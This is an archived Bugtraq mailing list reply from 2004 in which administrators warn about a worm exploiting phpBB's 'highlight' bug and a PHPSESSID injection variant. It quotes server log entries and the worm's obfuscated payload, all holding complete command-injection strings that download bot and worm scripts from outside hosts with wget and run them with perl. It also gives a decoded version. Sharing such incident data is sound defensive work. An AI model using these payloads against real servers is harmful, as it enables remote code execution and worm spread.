Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: phpBB Worm
From: Zeljko Brajdic <zebrajdi () inet hr>
Date: 25 Dec 2004 11:25:43 -0000

In-Reply-To: <Pine.LNX.4.61.0412241909320.23893 () mailbox prolocation net>

Received: (qmail 11902 invoked from network); 24 Dec 2004 20:01:50 -0000
Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
 by mail.securityfocus.com with SMTP; 24 Dec 2004 20:01:50 -0000
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
      by outgoing2.securityfocus.com (Postfix) with QMQP
      id CDA6D1436D1; Fri, 24 Dec 2004 13:06:19 -0700 (MST)
Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
Delivered-To: mailing list bugtraq () securityfocus com
Delivered-To: moderator for bugtraq () securityfocus com
Received: (qmail 7567 invoked from network); 24 Dec 2004 11:06:25 -0000
X-Authentication-Warning: mailbox.prolocation.net: raymond owned process doing -bs
Date: Fri, 24 Dec 2004 19:12:22 +0100 (CET)
From: Raymond Dijkxhoorn <raymond () prolocation net>
To: steve () uptime org uk
Cc: bugtraq () securityfocus com
Subject: Re: phpBB Worm
In-Reply-To: <20041224161026.27228.qmail () www securityfocus com>
Message-ID: <Pine.LNX.4.61.0412241909320.23893 () mailbox prolocation net>
References: <20041224161026.27228.qmail () www securityfocus com>
X-NCC-RegID: nl.multikabel
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed

Hi!

This assumes you're seeing GET-requests, but there are other ways
(e.g. POST) to exploit such code.

Whilst I understand your point, it should be noted that this 
vulnerability in phpBB is susceptible only to GET-based attacks: the 
vulnerable data is sourced from $HTTP_GET_VARS.

And it seems worse, we see even upgraded phpbb2 installs (2.0.11) 
succesfully and activly being exploited.

216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET 
/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 12758 "-" "LWP::Simple/5.803"
66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET 
/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 12758 "-" "LWP::Simple/5.79"
64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET 
/phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 68131 "-" "LWP::Simple/5.63"
[24/Dec/2004:19:09:26 +0100] "GET 
/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 20767 "-" "LWP::Simple/5.803"
205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET 
/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

HTTP/1.1" 200 20875 "-" "LWP::Simple/5.802"

Loads of those, and all request the files from civa.org

This is on a patched phpbb2, so be aware!!

I can confirm a changed version of this attack also. It didn't use the phpBB highlight bug but something different, 
looks like somekind of PHPSESSID injecting:

GET 
/knjiga.php?id=8043/antikvarijati.php?PHPSESSID=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
 HTTP/1.1" 200 20674 "-" "LWP::Simple/5.803"

*** This is on PHP 4.3.10, all phpBB2 are 2.0.11 ***

After sucsessfull wget-ing, one of files "worm.txt", is using google to find vulnerable phpBB2 (highlight bug) forums 
and use this:

$wb = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%2
52echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252ech
r(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)
%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252e
chr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(5
9)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%25
2echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr
(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)
%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252ec
hr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(10
5)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%25
2echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr
(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%
252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252ec
hr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(10
1)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%25
2echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr
(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%
252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252ec
hr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(11
2)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%25
2echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr
(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%
252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252ec
hr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(11
4)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%2
52e%2527';

That "decodes" into:

cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget 
www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl 
php.txt


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]